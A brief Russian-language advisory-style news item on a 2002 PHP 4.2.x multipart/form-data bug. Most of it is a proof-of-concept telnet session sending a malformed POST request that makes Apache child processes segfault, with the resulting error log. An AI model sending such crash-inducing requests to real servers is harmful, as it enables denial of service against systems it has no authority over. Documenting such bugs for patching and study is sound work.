Сегодня появился эксплоит для вчерашней
ошибки в РНР.
Пример для PHP 4.2.0 и PHP 4.2.1 с Apache 1.3.26 на Linux x86:
[jdog@wonderland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129
- -----------------------------123
Content-Disposition: filename
http://www.rapid7.com/
- -----------------------------123--
Connection closed by foreign host.
[jdog@wonderland logs]$ cat error_log
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation
fault (11)
[jdog@wonderland logs]$
